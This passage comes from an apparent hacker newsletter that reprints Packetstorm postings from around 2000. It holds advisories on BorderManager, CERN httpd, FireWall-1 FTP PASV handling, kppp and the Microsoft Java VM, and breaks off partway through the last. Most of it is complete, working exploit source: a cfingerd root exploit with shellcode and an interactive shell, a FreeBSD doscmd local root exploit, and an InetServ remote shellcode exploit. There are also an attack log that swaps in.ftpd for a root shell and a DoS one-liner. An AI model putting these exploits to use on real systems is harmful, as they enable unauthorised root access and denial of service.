replicate the memory allocation error but have not
had any luck with obtaining the high CPU
utilisation.
Again, csatpxy.nlm is loaded by default on this
system and unloading it stopped the memory
allocation errors.
matthew
-----Original Message-----
From: Chicken Man [mailto:chicknmon@HOTMAIL.COM]
Sent: Wednesday, 9 February 2000 11:59
Subject: Novell BorderManager 3.5 Remote Slow
Death
On a (default) installation of BorderManager 3.5
sp1, spc02 running on
NetWare 5.0 sp3a with nici 1.3.1, telnet to port
2000 on the firewall (on
either the public or private interfaces) and hit
enter a few times.
Utilization will jump (to 67% on our systems), and
the console will
immediately report an error similar to the
following:
1-27-2000 9:34:47 am: SERVER-5.0-830
[nmID=2000A]
Short Term Memory Allocator is out of Memory.
1 attempts to get more memory failed.
The telnet session will not disconnect, unless you
manually close the
connection. Over the course of two days (every few
minutes or so, YMMV) the error will repeat, with
the number of attempts steadily increasing (by
several million each time). Eventually (again, for
us it was two days, YMMV) the firewall will deny
all requests, and eventually crash completely.
Further symptoms:
Using tcpcon you can see something listening on
port 2000. If the telnet
session has been closed from the remote end,
tcpcon reports that the
previous session is in a "closewait" state. It may
be possible to do more bad things since this entry
never clears automatically (i.e. use up the rest
of system resources by opening and closing
connections to this port). It can be cleared using
tcpcon.
The misbehaving NLM is CSATPXY.NLM. It is the CS
Audit Trail Proxy, which is apparently loaded by
default on a BorderManager 3.5 install. From what
various people tell me, it could also be installed
on non-BorderManger Novell servers (though
probably not by default) which means this
vulnerability may extend beyond BorderManager 3.5.
Novell was contacted regarding this and the answer
was "unload the NLM".
Unloading the NLM does stop the slow death.
Rebooting will reload the NLM so it must be taken
out of whatever loads it on boot, of course.
<RANT>
Why is the port even accessable from the outside
(or the inside for that
matter)? The default BorderManager packet
filtering rules indictate that
pretty much everything is being passed. Why is the
NLM loaded by default?
Tcpcon shows various other services running that
shouldn't be either
(chargen, echo, etc). Why? What other
vulnerabilities am I missing?
</RANT>
enjoy,
ChicknMon
__________________________________________________
____
Get Your Private, Free Email at
http://www.hotmail.com
@HWA
169.0 CERN 3.0A Heap overflow advisory
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Packetstorm:
#$%$#$%$#$%$#$%$#$%$#$%$#$%$#$%$#$%$#$%$#
$% CERN 3.0A Heap overflow advisory %$
#$%$#$%$#$%$#$%$#$%$#$%$#$%$#$%$#$%$#$%$#
$% By Scrippie %$
#$ Phreak.nl $#
$%$#$%$#$%$#$%$#$%$#$%$#$%$#$%$#$%$#$%$#$
#$ Love To: Maja, Dopey, Hester $#
$%$#$%$#$%$#$%$#$%$#$%$#$%$#$%$#$%$#$%$#$
there is a heap overflow that wastes memory space in the CERN/3.0A webserver.
Offending source code file is: Daemon/Implememtation/HTScript.c
Offending function is: PUBLIC int HTCallScript ARGS1(HTRequest *, req)
Offending Code snippet:
else { /* Try replacing unknown suffix with .pp */
char *test = (char*)malloc(strlen(HTReqScript) + 4);
char *s;
CTRACE(stderr, "Trying...... to find executable by appending .pp\n");
strcpy(test, HTReqScript);
s = strrchr(test, '.');
strcat(test, ".pp"); /* Try appending .pp */
CTRACE(stderr, "Trying...... \"%s\"\n", test);
if (-1==access(test, X_OK)) { /* Then try replacing suffix with .pp */
if (s) {
*s = 0;
strcat(s, ".pp");
CTRACE(stderr, "Bad luck.... now trying \"%s\"\n", test);
if (-1==access(test, X_OK)) { /* INVALID */
if (!(msg = (char*)malloc(3*strlen(test) + 100)))
outofmem(__FILE__, "HTCallScript");
sprintf(msg,
"Bad script request -- none of '%s' and '%s.pp' is executable",
HTReqScript, test );
free(test);
So we see that test is malloced to hold HTReqScript + ".pp\0" after which
HTReqScript is copied to test, the dot is located and .pp is appended.
We note that strcat() does not just append ".pp" to the string, but rather
".pp\0".
Now, if the HTReqScript did contain a suffix CERN will go and use the char
pointer s to overwrite the suffix of HtReqScript.
If the HtRequest with the new ".pp" suffix cannot be found we print an error
message.
It seems CERN allocates 3*strlen(test) + 100 bytes for our error string...
Probabely some 100 for our static string and the rest for HtReqScript and test.
Sadly, the strcat on test will have limited the lenght of the test string, but
NOT of HtReqScript, so making sure we have a lot of characters after our
seperating dot overflows the heap.
Consider a HtReqScript of 1 A a dot and 50000 A's - now we get something like:
HtReqScript - somewhere around 50000 bytes (50003)
Test - the same as HtReqScript + 4 (50007)
After putting ".pp\0" into place however in our test array we get:
strlen(test) - 1 A, 1 dot, pp - hmmm, 3 bytes
Now our msg will be:
3*3+100=109 - by far enough to hold test, but by far NOT enough to hold
HtReqScript. Close to 50000 bytes of the heap will be ruined!
It's unlikely that this flaw is exploitable, since there is nothing on the
heap after the malloced msg, but I'd sure like to hear any ideas.
/* Scrip kids DoS attack section */
iLikeDossing# lynx http://www.lart.org/cgi-bin/A.`perl -e 'print"A" x 50000'`
Repeat several times and see memory usage jump to remarkable heights :)
/* End of script kiddies section */
A lot of thanks go to dvorak for pointing out to me that most webservers
seem to suffer some sort of flaw in their script parsing routines and for
telling me to take a look at HTScript.c
A quick patch:
--- HTScript.back Wed Jan 26 22:18:44 2000
+++ HTScript.c Wed Jan 26 22:19:52 2000
@@ -894,7 +894,7 @@
strcat(s, ".pp");
CTRACE(stderr, "Bad luck.... now trying \"%s\"\n", test);
if (-1==access(test, X_OK)) { /* INVALID */
- if (!(msg = (char*)malloc(3*strlen(test) + 100)))
+ if (!(msg = (char*)malloc(strlen(HTReqScript)+strlen(test) + 100)))
outofmem(__FILE__, "HTCallScript");
sprintf(msg,
(Isn't a unified diff a beautifull thing :-)
A big hooray to: #phreak.nl
A lots of love to: Dopey, Maja, Hester
Thanks to: dvorak
Cheers,
Scrippie - ronald@grafix.nl
@HWA
170.0 Cfingerd 1.3.3 (*BSD) remote root buffer overflow exploit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Packetstorm:
/*
* babcia padlina ltd. <babunia@freebsd.lublin.pl>
* cfingerd 1.3.3 (*bsd) root sploit
*
* usage: adjust ptr until cfingerd will segfault with some random data on
* output, now adjust ret.
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#define BUFFER_SIZE 80
#define ADDRS 190
#define PTR 0xbfbfd750
#define RET 0xbfbfd7d2
#define NOP 0x90
#define FILE1 "user.inf"
#define FILE2 "hack"
#define FILE3 "set.c"
#define SHELL "/tmp/sh"
#define FINGER 79
#define MAXLINE 1024
#define LOCALHOST 0x7f000001
#define GREEN "\E[1;32m"
#define RED "\E[1;31m"
#define NORM "\E[1;39m"
#define UNBOLD "\E[m"
void sh(sockfd)
int sockfd;
{
char buf[MAXLINE];
int c;
fd_set rf, drugi;
FD_ZERO(&rf);
FD_SET(0, &rf);
FD_SET(sockfd, &rf);
while (1)
{
bzero(buf, MAXLINE);
memcpy (&drugi, &rf, sizeof(rf));
select(sockfd+1, &drugi, NULL, NULL, NULL);
if (FD_ISSET(0, &drugi))
{
c = read(0, buf, MAXLINE);
send(sockfd, buf, c, 0x4);
}
if (FD_ISSET(sockfd, &drugi))
{
c = read(sockfd, buf, MAXLINE);
if (c<0) return;
write(1,buf,c);
}
}
}
int connectto(void)
{
int sockfd;
char sendbuf[MAXLINE];
struct sockaddr_in cli;
bzero(&cli, sizeof(cli));
cli.sin_family = AF_INET;
cli.sin_addr.s_addr=htonl(LOCALHOST);
cli.sin_port = htons(FINGER);
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
perror("socket");
return -1;
}
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0)
{
perror("connect");
return -1;
}
sprintf(sendbuf, "%.1023s\n", getenv("LOGNAME"));
write(sockfd, sendbuf, strlen(sendbuf));
sleep(1);
fflush(stdout);
fflush(stderr);
sh(sockfd);
return;
}
int main(argc, argv)
int argc;
char **argv;
{
char *buf1 = NULL, *buf2 = NULL, *p = NULL;
u_long *addr_ptr = NULL;
int noplen, i, bufsize = BUFFER_SIZE, addrs = ADDRS;
int retofs = 0, ptrofs = 0;
long ret, ptr;
FILE *phile;
char execshell[] =
"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff"SHELL"\x01\x01\x01\x01"
"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
fprintf(stderr, "\n"GREEN"babcia padlina ltd. cfingerd local root exploit"NORM UNBOLD"\n\n");
if(argc > 5)
{
bufsize = atoi(argv[1]);
addrs = atoi(argv[2]);
ptrofs = atoi(argv[3]);
retofs = atoi(argv[4]);
}
if(!(buf1 = malloc(bufsize+1)))
{
perror("malloc()");
return -1;
}
if(!(buf2 = malloc(addrs+1)))
{
perror("malloc()");
return -1;
}
ret = RET + ptrofs;
ptr = PTR + ptrofs;
noplen = bufsize - strlen(execshell);
memset(buf1, NOP, noplen);
strcat(buf1, execshell);
p = buf2;
addr_ptr = (unsigned long *)p;
for(i = 0; i < (addrs / 4) /2; i++)
*addr_ptr++ = ptr;
for(i = 0; i < (addrs / 4) /2; i++)
*addr_ptr++ = ret;
p = (char *)addr_ptr;
*p = '\0';
if ((phile = fopen(FILE1, "w")) == NULL)
{
perror("fopen()");
return -1;
}
fprintf(stderr, GREEN "RET:" RED "0x%x\n" GREEN "PTR:" RED "0x%x%\n\n" GREEN "setting up..." NORM UNBOLD "\n", ret, ptr);
fprintf(phile, "#Changing user database information for %s.\n"
"Shell: %s\n"
"Full Name: %s\n"
"Office Location: %s\n"
"Office Phone: \n"
"Home Phone: \n"
"Other information: \n",
getenv("LOGNAME"), getenv("SHELL"), buf2, buf1);
fclose(phile);
if ((phile = fopen(FILE2, "w")) == NULL)
{
perror("fopen()");
return -1;
}
fprintf(phile, "cat user.inf>\"$1\"\n");
fprintf(phile, "touch -t 2510711313 \"$1\"\n");
fclose(phile);
if ((phile = fopen(FILE3, "w")) == NULL)
{
perror("fopen()");
return -1;
}
// buffer is too small to execute seteuid/setegid there, so we have
// to do this here.
fprintf(phile, "main() { seteuid(getuid()); setegid(getgid()); system(\"id\"); execl(\"/bin/sh\", \"sh\", 0); }");
fclose(phile);
system("/usr/bin/cc -o " SHELL " " FILE3);
unlink(FILE3);
system("EDITOR=./" FILE2 ";export EDITOR;chmod +x " FILE2 ";chfn > /dev/null 2>&1");
unlink(FILE1);
unlink(FILE2);
if (connectto() < 0)
return -1;
unlink(SHELL);
return 0;
}
@HWA
171.0 FreeBSD 3.4-STABLE /usr/bin/doscmd local exploit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Packetstorm:
/*
*
* (c) 1999 babcia padlina ltd. <babunia@freebsd.lublin.pl>
* FreeBSD 3.4-STABLE /usr/bin/doscmd exploit.
*
*/
#include <stdio.h>
#include <sys/param.h>
#include <sys/stat.h>
#include <string.h>
#define NOP 0x90
#define BUFSIZE 1000
#define ADDRS 1200
long getesp(void)
{
__asm__("movl %esp, %eax\n");
}
int main(argc, argv)
int argc;
char **argv;
{
char *execshell =
"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
char *buf, *p;
int noplen, i, ofs, align;
long ret, *ap;
FILE *fp;
if(!(buf = (char *)malloc(BUFSIZE+1)))
{
perror("malloc()");
return -1;
}
if (argc < 3) { fprintf(stderr, "usage: %s ofs align\n", argv[0]); exit(0); }
ofs = atoi(argv[1]);
align = atoi(argv[2]);
noplen = BUFSIZE - strlen(execshell);
ret = getesp() + ofs;
memset(buf, NOP, noplen);
buf[noplen+1] = '\0';
strcat(buf, execshell);
setenv("EGG", buf, 1);
free(buf);
if(!(buf = (char *)malloc(ADDRS+align+1)))
{
perror("malloc()");
return -1;
}
memset(buf, 'a', align);
p = &buf[align];
ap = (unsigned long *)p;
for(i = 0; i < ADDRS / 4; i++)
*ap++ = ret;
p = (char *)ap;
*p = '\0';
fprintf(stderr, "ret: 0x%x\n", ret);
execl("/usr/bin/doscmd", "doscmd", buf, 0);
return 0;
}
@HWA
172.0 FireWall-1 FTP Server Vulnerability Background Paper #1
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Packetstorm: (Windows application attack)
PAPER
FireWall-1 FTP Server Vulnerability
Background Paper #1, data protect AG
John McDonald <jm@dataprotect.com>
Thomas Lopatic <tl@dataprotect.com>
References
----------
Please reference the recent vuln-dev posting by Mikael Olsson entitled,
"Breaking through FTP ALGs -- is it possible?" At the time of this
writing, it was not yet archived on the security focus web site.
Introduction
------------
The basic idea of the described attack is to subvert the security
policy implemented by a stateful firewall. This is done by triggering
the generation of a TCP packet that, when inspected by the firewall,
will change the firewall's internal state such that an attacker is
able to establish a TCP connection to a filtered port through the
firewall. This packet is the server response to a PASV user request
during a FTP session.
We have also come across this attack, and were in the process of
preparing a more comprehensive advisory, including other FireWall-1
security issues we have documented. The idea was to notify Check Point
of these problems and give them time to develop a software update.
However, since the general form of this vulnerability was
independently documented by Mikael Olsson and published to the
vuln-dev mailing list, we feel it is appropriate to distribute this
information now, as it relates specifically to FireWall-1, in order
to alert potential victims to this issue.
Description
-----------
Check Point FireWall-1 is vulnerable to an attack involving the
stateful support for the FTP protocol, specifically the handling of
the PASV command.
Typically, a user will send an FTP server the PASV command, and the
response from the FTP server will be the 227 message specifying to
which destination IP address and destination port the client is
expected to connect for the next data connection.
FireWall-1 monitors the packets sent from the FTP server to the
client, looking for the string "227 " at the beginning of each
packet. Upon a match, FireWall-1 will extract the destination IP
address and the destination port given in the packet payload, verify
that the specified IP address corresponds to the source address of
the packet, and allow an incoming TCP connection through the
firewall according to the destination IP address and the destination
port extracted from the datagram.
There are several restrictions on this connection which limit its
utility. Data can only travel in one direction and it cannot be to
a port that is listed in FireWall-1's list of well-known TCP
services. It is important to note that FireWall-1 version 3 does
not have this limitation, connections can be made to any port,
and the flow of data is not managed.
In order to trick FireWall-1 into allowing a connection to a port
on the FTP server, we must have the server send the "227 " string
as the first four bytes in a packet that, according to its source
port, belongs to a FTP control connection. We can typically
accomplish this by using the error handler of the FTP daemon,
in conjunction with limiting the MSS of our TCP connection.
This is easy to do by setting the MTU of our interface to a small
value we can work with, before we establish a control connection to
the victim FTP server. This causes the return packets from the
server to be smaller, allowing us to control more easily how data
is split into packets. Thus, we can make the "227 " message
returned by the error handler appear at the beginning of a packet.
Another way to accomplish this would be to ACK up to the message
we want to receive, and then have the server retransmit the data
we want to be contained in an isolated packet.
Here is an example of an attack based on this technique. There is
a FireWall-1 machine between gumpe and the 172.16.0.2 server, which
only permits incoming FTP connections. 172.16.0.2 is a default
Solaris 2.6 install, with the Tooltalk Database vulnerability.
We send the datagram directly to the service's TCP port, in spite of
this port being blocked by the firewall. Note that since there is no
response expected, the one-way restriction doesn't affect this
attack.
All of our testing was done on a Nokia IPSO machine running FW-1
version 4.0.SP-4.
[root@gumpe /root]# strings hackfile
localhost
""""3333DDDD/bin/ksh.-c.cp /usr/sbin/in.ftpd /tmp/in.ftpd.back ; rm -f
/usr/sbin/in.ftpd ; cp /bin/sh /usr/sbin/in.ftpd
[root@gumpe /root]# /sbin/ifconfig eth0 mtu 100
[root@gumpe /root]# nc -vvv 172.16.0.2 21
172.16.0.2: inverse host lookup failed:
(UNKNOWN) [172.16.0.2] 21 (?) open
220 sol FTP server (SunOS 5.6) ready.
...........................................227 (172,16,0,2,128,7)
500 '...........................................
[1]+ Stopped nc -vvv 172.16.0.2 21
[root@gumpe /root]# cat killfile | nc -vv 172.16.0.2 32775
172.16.0.2: inverse host lookup failed:
(UNKNOWN) [172.16.0.2] 32775 (?) open
sent 80, rcvd 0
[root@gumpe /root]# nc -vvv 172.16.0.2 21
172.16.0.2: inverse host lookup failed:
(UNKNOWN) [172.16.0.2] 21 (?) open
220 sol FTP server (SunOS 5.6) ready.
...........................................227 (172,16,0,2,128,7)
500 '...........................................
[2]+ Stopped nc -vvv 172.16.0.2 21
[root@gumpe /root]# cat hackfile | nc -vv 172.16.0.2 32775
172.16.0.2: inverse host lookup failed:
(UNKNOWN) [172.16.0.2] 32775 (?) open
sent 1168, rcvd 0
[root@gumpe /root]# nc -vvv 172.16.0.2 21
172.16.0.2: inverse host lookup failed:
(UNKNOWN) [172.16.0.2] 21 (?) open
id
uid=0(root) gid=0(root)
There is an easier way to perform a similar attack on this setup, since
the default Solaris FTP daemon allows a bounce attack, but this should
suffice to demonstrate the potential severity of this problem.
Summary
-------
If you have a FTP server behind a FireWall-1, it is possible for an
attacker to open TCP connections to certain ports on the machine,
and perform limited communication with those services. If you are
running FireWall-1 version 3, you should consider your FTP server to
have no TCP filtering. Solving this problem is inherently difficult,
but there are simple steps to take to minimize this risk. If the
machine is properly hardened, i.e. if there are no services available
on it, apart from FTP, this makes this vulnerability have little
significance.
You can also disable the PASV handling in the FireWall-1 GUI. However,
this breaks your configuration for passive FTP clients.
@HWA
173.0 Fool firewalls into opening their ports with PASV
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Packetstorm:
Multiple firewalls:
FTP Application Level Gateway "PASV" Vulnerability
Synopsis
--------
It is possible to cause certain firewalls to open up any
TCP port of your choice against FTP servers that are
"protected" by those firewalls. This is done by fooling
the FTP server into echoing "227 PASV" commands out through
the firewall.
Known affected firewalls
------------------------
Firewall-1 v3 allows full communication on the opened port
Firewall-1 v4 allows only inbound communication on the opened port
NOTE: THIS IS LIKELY A PROBLEM WITH MANY FIREWALLS, DO NOT
TAKE FOR GRANTED THAT YOUR FIREWALL IS SAFE JUST BECAUSE IT IS
NOT LISTED HERE
Background
----------
I've had this idea since late -98, but haven't gotten around to
doing anything about it. Recently, I posted a "possible vulnerability"
to vuln-dev@securityfocus.com, outlining my ideas. This resulted
in multiple responses from different people saying that they had
experienced attacks like this.
It would seem that I should have gone public with my concerns
a lot sooner, rather than having people frown upon them in private.
For my original, somewhat unstructed, thought process, entitled
"Breaking through FTP ALGs -- is it possible?", see:
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-02-8&msg=389FEB7B.AA290CC7@enternet.se
For an immediate confirmation regarding FW-1 v3 and v4 from
John McDonald, jm@dataprotect.com, and a real-life attack, entitled
"FireWall-1 FTP Server Vulnerability", see:
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-02-8&msg=38A1B2D9.3B244FAB@dataprotect.com
[Note: URLs are most likely wrapped]
This attack is most likely to work against stateful inspection
firewalls protecting servers.
It might also be possible to cause "proxy" like firewalls to
open arbitrary ports to protected servers.
In the extreme case, albeit a tad unlikely, it may be possible
to cause any type of firewall to open arbitrary ports against
FTP clients.
Take care, all
--
Mikael Olsson, EnterNet Sweden AB, Box 393, S-891 28 ÖRNSKÖLDSVIK
Phone: +46 (0)660 105 50 Fax: +46 (0)660 122 50
Mobile: +46 (0)70 248 00 33
WWW: http://www.enternet.se E-mail: mikael.olsson@enternet.se
@HWA
174.0 InetServ 3.0 remote DoS exploit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Packetstorm:
Home page: http://www.raza-mexicana.org
--=0---=0---=0---=0---=0---=0---=0---=0
POWERED by Linux eXtreme V1.1
--=0---=0---=0---=0---=0---=0---=0---=0
RaZa MeXiCaNa TeAm w w w . r a z a - m e x i c a n a . o r g
------------------------------------------------------------------
|D3VIL OF THE NET | - | THE FINAL DAY IS HERE|
-----BEGIN PGP MESSAGE-----
Version: 2.6.3i
owGtkcFKw0AQhsWT7FP8L5BcvAmCId2SQLKWGCT2YNl2x7La3YVNxFb6Sr6jY0C0
J0HyDf/h/2dght2P8+f1hYmrJ2P7lzMGv0iY6z/5mhI4pUGGJQuoIdGhRM5OjQla
jjLU4p+rhNKOrvB99COEdNrufpKbtQ39oU89DaIIjhZ6y/M+CJFMichDiMZ6bUKE
oR0WMRxoMwRU1r/uQd0QyZFo9FKjps7mWmm0lDngbawUERrvrAQOhD0sNuw8K0Xg
7naCk0//ZnZ5X1a4naMtJJRsceTlx9HNS5VVmGUPKO9QyEZO+14Qnw==
=An72
-----END PGP MESSAGE-----
--------------63FC237A4CB8A83445A20326
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
HI sorry,,, a person posts this exploit made for WIn32....
<br>i coded the same exploit, but it's compile in UNIX ,,,
<p>c-u
<br>thx
<br>
<pre>--
-----------------------------------------------------------------------------
--=0---=0---=0---=0---=0---=0---=0---=0
POWERED by Linux eXtreme V1.1
--=0---=0---=0---=0---=0---=0---=0---=0
RaZa MeXiCaNa TeAm w w w . r a z a - m e x i c a n a . o r g
------------------------------------------------------------------
|D3VIL OF THE NET | - | THE FINAL DAY IS HERE|
-----BEGIN PGP MESSAGE-----
Version: 2.6.3i
owGtkcFKw0AQhsWT7FP8L5BcvAmCId2SQLKWGCT2YNl2x7La3YVNxFb6Sr6jY0C0
J0HyDf/h/2dght2P8+f1hYmrJ2P7lzMGv0iY6z/5mhI4pUGGJQuoIdGhRM5OjQla
jjLU4p+rhNKOrvB99COEdNrufpKbtQ39oU89DaIIjhZ6y/M+CJFMichDiMZ6bUKE
oR0WMRxoMwRU1r/uQd0QyZFo9FKjps7mWmm0lDngbawUERrvrAQOhD0sNuw8K0Xg
7naCk0//ZnZ5X1a4naMtJJRsceTlx9HNS5VVmGUPKO9QyEZO+14Qnw==
=An72
-----END PGP MESSAGE-----</pre>
</html>
--------------63FC237A4CB8A83445A20326--
--------------B105FA723A5B39CE8CFB14A1
Content-Type: text/plain; charset=us-ascii;
name="inetserv-exp.c"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
filename="inetserv-exp.c"
/**********************************************************************
InetServ 3.0 (Windows NT) REMOTE EXPLOIT CODEd by dr_fdisk^
***********************************************************************
CLASE: DENIAL OF SERVICE
BUG/SHELLCODE FOUND by: Greg Hoglund
))))))))))))((((((((((((
)))RaZa MeXiCaNa TeAm(((
))))))))))))((((((((((((
w w w . r a z a - m e x i c a n a . o r g
((((((((((((((((((((((((((((((((((((((((((
************************************************************************
Aclaracion: el exploit lo programe porque lo necesitaba usar bajo Unix y
no en entorno Windows como fue presentado.
************************************************************************/
/***********************************************************************
-----BEGIN PGP MESSAGE-----
Version: 2.6.3i
owGtkMFKw0AQhtXjPsX3AimIN9HDkm5pIIkSg8QeKmt3lUWThbVilb6S7+iYkz0J
km/4D//MwAz/18nFw/HpkcAvMuHyT362FIc0aFYiqDB0FOTi6rFDKy1Npf55StW2
9+e4dP/owuvzGqWyKVF5jMmFwbqYcP6F6xQ//GYbKcPwtsN32+R7rxq7slS+C7mt
La3XPbyPNSNh+RRl9Hh2BDbiBtGMKNOnCV4+zHx+dluUXC1ol4batOzl+H50i6LW
JXN9R3HD0jRm2rwk/28=
=92LB
-----END PGP MESSAGE-----
************************************************************************/
/*------------------------------*
* DEFINIR EL PUERTO DEFAULT */
/*------------------------------*/
#define PUERTO 224
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
/*------------------------------*
* COLORES DEFINIDOS */
/*------------------------------*/
#define NORMAL "\E[m"
#define VERDE "\E[32m"
#define BRILLOSO "\E[1m"
#define ROJO "\E[31m"
#define CELESTE "\E[36m"
#define AZUL "\E[34m"
char shellcode[] =
"GET /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \
"AAAAAAAAAAABBBBAAAACCCCAAAAAAAAAAAAAAAAAAAAAAAAAAA" \
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \
"AAAAAAAAAAAAAAAAAAAAAAAAAAADDDDAAAAEEEEAAAAAAAAAAA" \
"\xB8\xFF\x1F\xED\x12\x2C\xFF\xC1\xC0\x18\x8B\xD8" \
"\x33\xC9\xB1\x46\x48\x80\x30\x80\x49\x75\xF9" \
"\x53\xB8\x48\x77\x78\x77\xBA\x77\x77\x77\x77" \
"\x33\xC2\x50\x33\xC0\x50\xB8\xAE\x9B\x65\x77\x33\xC2\x50"
"\xB8\x75\x77\x77\xF7\x33\xC2\x50\xB8\x7B\xA7\x34\x77" \
"\x33\xC2\xFF\x10\x8B\xFB\xBA\x77\x77\x77\x77" \
"\xB8\x63\x9A\x65\x77\x33\xC2\x2B\xD8\x53\x50" \
"\x6A\x01\x33\xC9\x51\xB8\x70\x9A\x65\x77" \
"\x33\xC2\x50\xFF\x37\xB8\x77\xA7\x34" \
"\x77\x33\xC2\xFF\x10\xCC"\
"AAAAAAAAAAAAAAA" \
"\x90\x90\xEB\x80\xEB\xD9\xF9\x77" \
"\xDC\xD3\xCF\xC6\xD4\xD7\xC1\xD2\xC5\xDC\xCD\xE9\xE3\xF2" \
"\xEF\xF3\xEF\xE6\xF4\xDC\xD7\xE9\xEE\xE4\xEF\xF7\xF3\xDC\xC3" \
"\xF5\xF2\xF2\xE5\xEE\xF4\xD6\xE5\xF2\xF3\xE9\xEF\xEE\xDC" \
"\xD2\xF5\xEE\x80" \
"\xDF\xD5\xD2\xDF\xC8\xC1\xD8\xCF\xD2\xC5\xC4\xDF\x80" \
"\xE3\xED\xE4\xAE\xE5\xF8\xE5\xA0\xAF\xE3\x80\x80\x80\x80\x80";
void victima(char *conn22);
int conexion;
void victima(char *conn22)
{
struct sockaddr_in sin;
struct hostent *hp;
hp = gethostbyname(conn22);
if (hp==NULL) {
printf("%s%sEl host %s no existe!!!!\n",ROJO,BRILLOSO,conn22);
exit(0);
}
bzero((char*) &sin, sizeof(sin));
bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
sin.sin_family = hp->h_addrtype;
sin.sin_port = htons(PUERTO);
conexion = socket(AF_INET, SOCK_STREAM, 0);
connect(conexion,(struct sockaddr *) &sin, sizeof(sin));
}
void main(int argc, char **argv)
{
char buffer[1500];
int a;
char salida[50];
if (argc != 2) {
system("clear");
printf("\n\n\n\n");
printf("%s%s InetServ 3.0 (Windows NT) REMOTE EXPLOIT CODEd by dr_fdisk^\n",VERDE,BRILLOSO);
printf("%s----------------------------------------------------------------------\n\n",CELESTE);
printf ("%s RaZa MeXiCaNa TeAm %swww.raza-mexicana.org\n\n",ROJO,CELESTE);
printf ("-------===============================-------\n\n\n");
printf("Uso: %s%s <hostname>\n\n",AZUL,argv[0]);
exit(0);
}
printf("%s%sVictima: %s \n"NORMAL,ROJO,BRILLOSO,argv[1]);
printf("%s----------------------------------------------------"NORMAL,AZUL);
victima(argv[1]);
sprintf(buffer,"%s",shellcode);
send(conexion, buffer, strlen(buffer), 0);
printf("%s%s%sTHE END\n\n",NORMAL,VERDE,BRILLOSO);
}
/*********************************THE END************************************/
@HWA
175.0 ppp 1.6.14 shows local user the saved PPP password
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Packetstorm:
here exists a bug in kppp 1.6.14 where a local
user dialing up into the internet can copy the
stars in the password box and put them into an
xterm where the stars will be unrevealed and
that password will be shown.
seeya
rarez
rarez@bonbon.net
(Seems unlikely, like Revelation?? -Ed)
@HWA
176.0 Another screw up in MS's Java Virtual Machine, breaks security.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Packetstorm:
Jan 28, 2000
Translator's note:
We announce another security hole of Microsoft Virtual Machine�$B!!�(B
(Microsoft VM) for Java, including the latest version. This is the
translation version of the warning note (written in Japanese) by Dr.
Hiromitsu Takagi posted at the Java House Mailing List, a Japanese Java
user discussion site (http://java-house.etl.go.jp/ml/ . Japanese fonts
required to display). The finding is summarized after numerical tests
and discussion among the members. Mr. Kensuke Tada originated the
discussion. The translation is made available by Dr. Tomohira Tabata
(ttabata@ucsd.edu) for his friends and others who may be benefit from
the information. Please note that Dr. Tomohira Tabata has no
responsibility on mistranslation on this document.
The finding is:
This security vulnerability allows a Java applet to read out any files
on certain directories. A simple code attacks the security hole. Since
a beginning Java programmer can exercise one, all users should be
noted. Its vulnerability is quite dangerous and immediate de-activation
of IE Java function provided by Microsoft is highly recommended;
possibly changing to Netscape Navigator, Communicator or Sun Java
Plug-in by the time Microsoft providing a "fix".
The body of the warning note by Dr. Hiromitsu Takagi:
----------------------------------------------------------------------------------------------------------
This is a warning for all users of Microsoft Internet Explorer version 4
and 5 (IE4, IE5) for Microsoft Windows95/98/NT.
This security hole is closely CLASSPATH for Java users and especially for the Java Developer; the note
is posted.
Vulnerability
-------------
This security vulnerability allows a Java applet to read any "known
files", which are common to most configuration. A hosted web site is
able to retrieve file information through the applet code
automaticallyspecific files which popular applications hold, and
files with common names which users occasionally choose,
This does not allow any change or deletion of local files. We still
believe this vulnerability is quite dan
Detail description
------------------
